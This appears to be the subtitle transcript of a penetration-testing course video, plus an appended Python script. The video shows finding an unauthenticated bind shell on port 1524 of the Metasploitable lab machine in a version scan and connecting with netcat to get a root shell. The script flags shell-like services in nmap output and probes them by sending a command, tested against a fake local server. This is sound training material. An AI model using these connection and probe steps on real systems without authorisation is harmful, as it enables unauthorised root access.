1
00:00:00,300 --> 00:00:01,470
- Welcome back,

2
00:00:01,470 --> 00:00:03,330
In this video we are going to cover

3
00:00:03,330 --> 00:00:05,678
and talk about misconfigurations.

4
00:00:05,678 --> 00:00:08,652
And also in this very video we will cover the

5
00:00:08,652 --> 00:00:13,020
easiest possible vulnerability that you could ever find.

6
00:00:13,020 --> 00:00:14,970
You might have already noticed it

7
00:00:14,970 --> 00:00:17,771
while we scanned Metasploitable, and if you didn't,

8
00:00:17,771 --> 00:00:21,600
I will give you a chance to find it right now.

9
00:00:21,600 --> 00:00:25,170
So what I did right here is, I performed a version scan

10
00:00:25,170 --> 00:00:27,480
on the Metasploitable virtual machine.

11
00:00:27,480 --> 00:00:29,790
You can do the same, or you can just take

12
00:00:29,790 --> 00:00:32,159
a look at the results right here.

13
00:00:32,159 --> 00:00:35,190
And do you by any chance see something that

14
00:00:35,190 --> 00:00:37,980
sticks out right here, something that shouldn't

15
00:00:37,980 --> 00:00:41,340
be here? Now you should be able to figure it out

16
00:00:41,340 --> 00:00:43,650
based on what we have learned so far.

17
00:00:43,650 --> 00:00:45,783
So I will just give you a few seconds.

18
00:00:50,190 --> 00:00:51,990
And the time has come.

19
00:00:51,990 --> 00:00:54,030
Have you managed to find it?

20
00:00:54,030 --> 00:00:57,431
It is this bind shell right here.

21
00:00:57,431 --> 00:01:02,431
And under version it says "Metasploitable root shell".

22
00:01:02,970 --> 00:01:04,470
I mean, just by its name

23
00:01:04,470 --> 00:01:07,500
we can see that something doesn't seem right.

24
00:01:07,500 --> 00:01:09,720
We know what a bind shell is, right?
25
00:01:09,720 --> 00:01:12,965
So if this service doesn't have any type of authentication,

26
00:01:12,965 --> 00:01:15,060
we can just try to connect

27
00:01:15,060 --> 00:01:19,230
to the port that hosts this bind shell, in this case

28
00:01:19,230 --> 00:01:24,230
port 1524 over TCP, and we will be given our root shell

29
00:01:24,249 --> 00:01:26,103
on that machine.

30
00:01:27,270 --> 00:01:30,000
Can't be that easy, right?

31
00:01:30,000 --> 00:01:34,020
Well, it is, and I wouldn't even consider this an exploit.

32
00:01:34,020 --> 00:01:35,700
This is just an example

33
00:01:35,700 --> 00:01:38,550
of what a misconfiguration could look like.

34
00:01:38,550 --> 00:01:41,369
Now this would be a critical misconfiguration

35
00:01:41,369 --> 00:01:43,711
that would almost never happen,

36
00:01:43,711 --> 00:01:47,040
but sometimes even stuff like this can happen.

37
00:01:47,040 --> 00:01:49,110
Maybe an administrator set up something

38
00:01:49,110 --> 00:01:50,638
like this so he can access that machine

39
00:01:50,638 --> 00:01:53,040
from his home or from somewhere else,

40
00:01:53,040 --> 00:01:56,550
but he forgot to put authentication on it.

41
00:01:56,550 --> 00:01:58,050
You never know.

42
00:01:58,050 --> 00:02:01,419
Okay, so how can we establish a connection to this port?

43
00:02:01,419 --> 00:02:04,209
Well, we won't be using the Metasploit framework

44
00:02:04,209 --> 00:02:06,670
for this particular thing.

45
00:02:06,670 --> 00:02:11,000
Instead we are going to use a tool called Netcat.

46
00:02:11,000 --> 00:02:14,850
And Netcat is a program that allows us to establish network

47
00:02:14,850 --> 00:02:18,630
connections with other machines using both TCP

48
00:02:18,630 --> 00:02:21,458
and UDP. To open the Netcat help menu, we can type

49
00:02:21,458 --> 00:02:26,458
nc -h, which stands for help.

50
00:02:26,671 --> 00:02:30,776
And here we can see the menu isn't that big at all.
51
00:02:30,776 --> 00:02:33,779
It only has a few options right here, and at

52
00:02:33,779 --> 00:02:36,510
the beginning of the menu we also have

53
00:02:36,510 --> 00:02:38,097
these two main options.

54
00:02:38,097 --> 00:02:43,097
We can either connect to somewhere, or we can listen

55
00:02:43,153 --> 00:02:46,860
for inbound or incoming connections.

56
00:02:46,860 --> 00:02:50,182
Since our Metasploitable target machine has a bind shell,

57
00:02:50,182 --> 00:02:55,080
that means we must connect to somewhere, and the syntax

58
00:02:55,080 --> 00:02:57,780
is just nc, then the hostname or

59
00:02:57,780 --> 00:03:00,033
the IP address, and then the port.

60
00:03:01,155 --> 00:03:02,940
Let's try it out.

61
00:03:02,940 --> 00:03:05,332
If I go down here and type nc

62
00:03:05,332 --> 00:03:07,565
and then the IP address of my Metasploitable,

63
00:03:07,565 --> 00:03:08,681
I go and check

64
00:03:08,681 --> 00:03:12,303
over which port the bind shell is being hosted.

65
00:03:13,618 --> 00:03:17,070
It is over port 1524, and I will type space

66
00:03:17,070 --> 00:03:20,730
and then the port, or let me just clear the screen first

67
00:03:20,730 --> 00:03:22,950
and type nc 192.168

68
00:03:22,950 --> 00:03:27,950
.1.5, then space 1524, press enter, and it worked.

69
00:03:32,100 --> 00:03:34,050
We are again our root account

70
00:03:34,050 --> 00:03:36,321
on the Metasploitable machine.

71
00:03:36,321 --> 00:03:40,421
And as in the previous video, we can do anything we want.

72
00:03:40,421 --> 00:03:43,881
See, if I type whoami, we can see we are the root account.

73
00:03:43,881 --> 00:03:47,880
ls tells us what directories we have.

74
00:03:47,880 --> 00:03:50,372
And remember the test directory from the previous video?

75
00:03:50,372 --> 00:03:51,511
Here it is.

76
00:03:51,511 --> 00:03:54,870
ifconfig will give us the IP address

77
00:03:54,870 --> 00:03:56,692
of the Metasploitable machine.
78
00:03:56,692 --> 00:04:00,053
So everything works as in the previous video.

79
00:04:00,053 --> 00:04:02,250
We are the root account

80
00:04:02,250 --> 00:04:05,472
and we can execute commands on the target system.

81
00:04:05,472 --> 00:04:09,161
Now don't get used to this type of exploitation.

82
00:04:09,161 --> 00:04:13,200
Matter of fact, I wouldn't even consider this an exploitation,

83
00:04:13,200 --> 00:04:15,810
because the vulnerability wasn't in software,

84
00:04:15,810 --> 00:04:18,570
but in a person who would set something like this up

85
00:04:18,570 --> 00:04:21,209
without ever authenticating.

86
00:04:21,209 --> 00:04:23,370
Stuff like this rarely happens,

87
00:04:23,370 --> 00:04:25,620
but I wanted to show you this just to see

88
00:04:25,620 --> 00:04:28,042
whether you would notice it in our scan.

89
00:04:28,042 --> 00:04:30,450
In the next video we're going to check

90
00:04:30,450 --> 00:04:33,060
out another quick vulnerability that is based

91
00:04:33,060 --> 00:04:35,070
on information disclosure.

92
00:04:35,070 --> 00:04:37,050
After that, we're getting slowly

93
00:04:37,050 --> 00:04:39,840
into harder and harder exploits.

94
00:04:39,840 --> 00:04:41,140
See you in the next video.
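The two steps the video walks through, spotting the "Metasploitable root shell" entry in the version scan and then connecting to port 1524 with nc, can be automated so the same check runs over any scan result. The Python below is an added example and is not part of the video or of Metasploitable itself: the nmap -sV excerpt is constructed to match the shape of the scan shown, the IP 192.168.1.5 is the one typed in the video, and the "bind shell" server at the end is a constructed stand-in that answers a fixed table of commands and executes nothing, so the probe can be exercised offline on 127.0.0.1. The probe function does exactly what nc does: open a TCP connection with no authentication, send a command, read the reply.

```python
"""Added example (not from the video): triage an nmap -sV result for an
unauthenticated bind shell, then confirm it the way nc does.

The nmap output and the 'bind shell' server are CONSTRUCTED for this example.
"""
import re
import socket
import threading

# Constructed nmap -sV excerpt in the shape of the video's scan result
NMAP_SV_OUTPUT = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
1524/tcp open  bindshell   Metasploitable root shell
"""

PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")
# Words in a service name or version string that mean "a shell with no login"
SHELL_HINTS = ("shell", "backdoor")


def find_bind_shells(nmap_output):
    """Return (port, proto, service, version) for open ports whose service or
    version string advertises a shell, i.e. the thing that should not be in a scan."""
    hits = []
    for line in nmap_output.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue
        port, proto, service, version = m.groups()
        text = f"{service} {version}".lower()
        if any(h in text for h in SHELL_HINTS):
            hits.append((int(port), proto, service, version.strip()))
    return hits


def nc_command(host, port):
    """The one-liner the video types: connect with netcat, no authentication."""
    return f"nc {host} {port}"


def probe_bind_shell(host, port, command="whoami", timeout=3.0):
    """Do what 'nc host port' plus typing a command does: open a TCP connection,
    send the command and return the first line the remote side answers."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall((command + "\n").encode())
        data = b""
        while not data.endswith(b"\n"):
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return data.decode(errors="replace").strip()


# --- constructed stand-in for the Metasploitable bind shell (simulation only) ---
FAKE_RESPONSES = {"whoami": "root", "id": "uid=0(root) gid=0(root) groups=0(root)"}


def start_fake_bind_shell():
    """Listen on an ephemeral localhost port and answer one command from
    FAKE_RESPONSES. Nothing is executed; this only models an unauthenticated
    shell so probe_bind_shell() has something to talk to offline."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def serve():
        conn, _ = srv.accept()
        with conn:
            line = conn.makefile("rb").readline().decode().strip()
            reply = FAKE_RESPONSES.get(line, f"{line}: not found")
            conn.sendall((reply + "\n").encode())
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port


if __name__ == "__main__":
    for port, proto, service, version in find_bind_shells(NMAP_SV_OUTPUT):
        print(f"suspicious: {port}/{proto} {service} {version!r}"
              f" -> try: {nc_command('192.168.1.5', port)}")
    fake_port = start_fake_bind_shell()
    print("probe says we are:", probe_bind_shell("127.0.0.1", fake_port))
```

Against a real target, point probe_bind_shell() at the host and port that find_bind_shells() flagged; if the answer to whoami comes back without any login prompt, the scan finding is confirmed. Keep the command to something harmless like whoami or id: the point of the probe is to prove that there is no authentication, not to change anything on the box.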